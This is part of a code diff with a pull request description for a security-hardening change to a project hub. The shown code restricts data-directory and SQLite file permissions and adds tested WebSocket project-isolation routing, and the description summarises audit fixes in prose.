+      chmodSpy.mockRestore() // use the real chmod for this one
+      const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'securefs-'))
+      const file = path.join(dir, 'jobs.sqlite')
+      fs.writeFileSync(file, 'x')
+      secureDir(dir)
+      secureDbFile(file)
+      expect(fs.statSync(dir).mode & 0o777).toBe(0o700)
+      expect(fs.statSync(file).mode & 0o777).toBe(0o600)
+      fs.rmSync(dir, { recursive: true, force: true })
+    })
+  })
+
+  describe('on Windows', () => {
+    beforeEach(() => setPlatform('win32'))
+
+    it('secureDir is a no-op', () => {
+      secureDir('C:\\some\\dir')
+      expect(chmodSpy).not.toHaveBeenCalled()
+    })
+
+    it('secureDbFile is a no-op', () => {
+      secureDbFile('C:\\some\\jobs.sqlite')
+      expect(chmodSpy).not.toHaveBeenCalled()
+    })
+  })
+})

--- a/server/util/secure-fs.ts
+++ b/server/util/secure-fs.ts
@@ -1,0 +1,41 @@
+import fs from 'fs'
+
+/**
+ * Best-effort filesystem hardening for the ~/.specrails data stores (H-13).
+ *
+ * The auth token is deliberately persisted 0600, but the SQLite databases were
+ * created with the default umask (typically dir 0755 / file 0644), leaving
+ * webhook HMAC secrets, chat transcripts, and verbatim terminal command history
+ * world-readable on a multi-user machine. These helpers restrict the data dir to
+ * owner-only and the db files (plus their WAL sidecars) to owner read/write.
+ *
+ * POSIX permission bits are a no-op on Windows (NTFS uses ACLs and the per-user
+ * profile already isolates the home dir), so both helpers early-return there —
+ * we never pretend a chmod that did nothing succeeded.
+ */
+
+/** Restrict a directory to owner-only (0700). No-op on Windows / on error. */
+export function secureDir(dir: string): void {
+  if (process.platform === 'win32') return
+  try {
+    fs.chmodSync(dir, 0o700)
+  } catch {
+    // Best-effort: a chmod failure must never crash startup.
+  }
+}
+
+/**
+ * Restrict a SQLite db file and its `-wal`/`-shm` sidecars to 0600.
+ * No-op on Windows, for `:memory:`, and on error (sidecars may not exist yet).
+ */
+export function secureDbFile(dbPath: string): void {
+  if (process.platform === 'win32') return
+  if (dbPath === ':memory:') return
+  for (const file of [dbPath, `${dbPath}-wal`, `${dbPath}-shm`]) {
+    try {
+      fs.chmodSync(file, 0o600)
+    } catch {
+      // Sidecar may not exist yet, or fs may reject — best-effort.
+    }
+  }
+}

--- a/server/ws-routing.test.ts
+++ b/server/ws-routing.test.ts
@@ -1,0 +1,50 @@
+import { describe, it, expect } from 'vitest'
+import { shouldDeliverToSubscriber, parseSubscribeFrame } from './ws-routing'
+
+describe('shouldDeliverToSubscriber (H-09 project isolation)', () => {
+  it('delivers hub-level messages (no projectId) to everyone', () => {
+    expect(shouldDeliverToSubscriber(undefined, null)).toBe(true)
+    expect(shouldDeliverToSubscriber(undefined, 'proj-a')).toBe(true)
+  })
+
+  it('delivers all project-scoped messages to an undeclared subscriber (back-compat)', () => {
+    expect(shouldDeliverToSubscriber('proj-a', null)).toBe(true)
+    expect(shouldDeliverToSubscriber('proj-b', null)).toBe(true)
+  })
+
+  it('delivers only the subscribed project to a declared subscriber', () => {
+    expect(shouldDeliverToSubscriber('proj-a', 'proj-a')).toBe(true)
+    expect(shouldDeliverToSubscriber('proj-b', 'proj-a')).toBe(false)
+  })
+
+  it('isolates two projects with colliding ids from each other', () => {
+    // The core guarantee the Mobile Gateway depends on: a device scoped to A
+    // never receives B's stream.
+    expect(shouldDeliverToSubscriber('B', 'A')).toBe(false)
+    expect(shouldDeliverToSubscriber('A', 'B')).toBe(false)
+  })
+})
+
+describe('parseSubscribeFrame', () => {
+  it('parses a well-formed subscribe frame', () => {
+    expect(parseSubscribeFrame(JSON.stringify({ type: 'subscribe', projectId: 'proj-a' })))
+      .toEqual({ subscribe: true, projectId: 'proj-a' })
+  })
+
+  it('clears the subscription when projectId is not a string', () => {
+    expect(parseSubscribeFrame(JSON.stringify({ type: 'subscribe', projectId: 123 })))
+      .toEqual({ subscribe: true, projectId: null })
+    expect(parseSubscribeFrame(JSON.stringify({ type: 'subscribe' })))
+      .toEqual({ subscribe: true, projectId: null })
+  })
+
+  it('ignores non-subscribe frames', () => {
+    expect(parseSubscribeFrame(JSON.stringify({ type: 'something-else' })))
+      .toEqual({ subscribe: false, projectId: null })
+  })
+
+  it('never throws on malformed JSON', () => {
+    expect(parseSubscribeFrame('not json {{{')).toEqual({ subscribe: false, projectId: null })
+    expect(parseSubscribeFrame('')).toEqual({ subscribe: false, projectId: null })
+  })
+})

--- a/server/ws-routing.ts
+++ b/server/ws-routing.ts
@@ -1,0 +1,45 @@
+// Pure, testable WebSocket routing decisions (H-09). Kept out of index.ts (which
+// is excluded from coverage and not unit-tested) so the project-isolation logic
+// that the Mobile Gateway will depend on is covered and verifiable.
+
+/**
+ * Decide whether a broadcast message should be delivered to a given connection.
+ *
+ * - Hub-level messages (no projectId) go to everyone.
+ * - A connection that has NOT declared a subscription (`subscribedProjectId`
+ *   null) receives everything — back-compat with the current web client, whose
+ *   own client-side filter remains as a redundant second layer.
+ * - A connection subscribed to project P receives only P's project-scoped
+ *   messages (plus all hub-level ones).
+ *
+ * The Mobile Gateway turns this into a hard authorization boundary by always
+ * subscribing each device connection to exactly the project(s) it may see.
+ */
+export function shouldDeliverToSubscriber(
+  msgProjectId: string | undefined,
+  subscribedProjectId: string | null,
+): boolean {
+  if (msgProjectId === undefined) return true
+  if (subscribedProjectId === null) return true
+  return subscribedProjectId === msgProjectId
+}
+
+/**
+ * Parse an inbound WS control frame and return the projectId to subscribe to.
+ *
+ * Returns `{ subscribe: true, projectId }` for a well-formed
+ * `{ type: 'subscribe', projectId: <string|null> }` frame (a non-string
+ * projectId clears the subscription → null), or `{ subscribe: false }` for
+ * anything else / malformed input. Never throws.
+ */
+export function parseSubscribeFrame(raw: string): { subscribe: boolean; projectId: string | null } {
+  try {
+    const parsed = JSON.parse(raw) as { type?: string; projectId?: unknown }
+    if (parsed?.type === 'subscribe') {
+      return { subscribe: true, projectId: typeof parsed.projectId === 'string' ? parsed.projectId : null }
+    }
+  } catch {
+    // Malformed control frame — ignore.
+  }
+  return { subscribe: false, projectId: null }
+}


### PR DESCRIPTION
## Summary

Resolves the findings from the **multi-agent security audit** plus the **Fase 0** network-hardening list (precondition for exposing the hub to the LAN / the future mobile companion). 60 files, +1740/−176.

**Validation:** server 2729 tests ✓ (coverage 82.4% stmts / 84.1% lines / 87.2% funcs / 73.1% branches), client 2383 tests ✓ (81.6% lines/stmts), typecheck clean. All CI thresholds met.

## What's in here

**Network / auth (Fase 0)** — Host-header validation (anti DNS-rebinding), `requireLoopback` on `/api/hub/token` + `/otlp` + `/api/docs`, constant-time token compare (REST + WS), server-side WS project routing + `maxPayload` + backpressure, documented master-token model.

**Injection / path safety** — `/issues` via `execFileSync` argv (RCE fix), ticket-store `storagePath` containment, git `fsmonitor`/`hooks` neutralization in untrusted repos, plugin orphan-uninstall containment, docs `..` traversal, attachment key guard, Windows drag-drop PowerShell-safe quoting, `updateAgent` column allow-list.

**Data integrity / concurrency** — transactional + FK-safe `purgeJobs`/`deleteJob` with orphan-row cleanup, atomic/fail-safe migration runner, one corrupt project DB no longer kills the hub, synchronous active-slot reservation in QueueManager, queued-cancel fires `onJobFinished`, rail stop cancels all its jobs, ChatManager turn reservation, explore cap no longer bypassable, `removeProject` disposes the remaining managers before `db.close()`, SMASH concurrency guard + undo restores `done`, from-draft idempotency.

**Correctness / analytics** — spending surface validation, `byMode` distinct-ticket count, file-summary in timeline, `period=all` no longer zero-fills from 1970, hub-analytics custom-date `RangeError` guard, contract-refine idempotent append.

**Client** — per-instance WS handler ids, modal closes on project switch (no cross-project save), `doLaunchRail` pins API base, CSP, `useWebSocket` handler detach, `useTickets` refetch on reconnect, `useProjectCache` stale-key guard, compare-URL restore, last-active-project restore, `localStorage` try/catch, in-memory chip cap.

**Permissions / secrets** — `~/.specrails` dirs `0700` + SQLite `0600`, diagnostic ZIP redaction, `removeProject` wipes the project data dir.

**Supply chain / CI** — FTP → FTPS for release uploads, `sync-core-contract` `repository_dispatch` injection fix, OTLP per-job hard cap, file-lock map cleanup. (Also carries a pre-existing Hostinger retention change in `desktop-release.yml`.)

## Reviewer notes — verify before/after merge
- **FTPS** (`desktop-release.yml`): Hostinger supports explicit FTPS, but this wasn't testable here. If a release upload fails, revert `protocol: ftps` → `ftp` (commented inline).
- Deferred (need external data / environment, **not** in this PR): pin third-party Action SHAs, better-sqlite3 / gitleaks checksums, Rust PATH-sentinel, Node SHASUMS GPG, ticket-store cross-process lock, terminal WS reconnect.

🤖 Generated with [Claude Code](https://claude.com/claude-code)